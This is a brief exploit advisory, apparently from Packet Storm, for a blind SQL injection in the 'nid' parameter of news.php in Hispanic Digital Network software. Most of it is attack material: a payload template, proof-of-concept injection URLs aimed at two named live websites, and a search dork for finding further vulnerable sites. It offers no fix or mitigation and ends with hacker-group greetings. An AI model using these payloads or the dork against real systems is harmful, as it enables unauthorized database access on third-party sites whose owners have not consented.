Hispanic Digital Network suffers from a remote blind SQL injection vulnerability.
82dbb2ee981c637f1c517f45b22289d648a06591842e65e6e0ea1d698e3d73f8==============================================================================
[o] Hispanic Digital Network Blind SQL Injection Vulnerability
Software : Hispanic Digital Network
Vendor : http://www.hdnweb.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
==============================================================================
[o] Vulnerable file
news.php
[o] Exploit
http://localhost/[path]/news.php?nid=[Blind SQL]
[o] Proof of Concept
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4 << false
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5 << true
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=4 << false
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=5 << true
[o] Dork
"powered by Hispanic Digital Network"
==============================================================================
[o] Greetz
Anti Security [ http://antisecurity.org ]
Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe
H312Y yooogy mousekill }^-^{ martfella noname s4va
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
==============================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed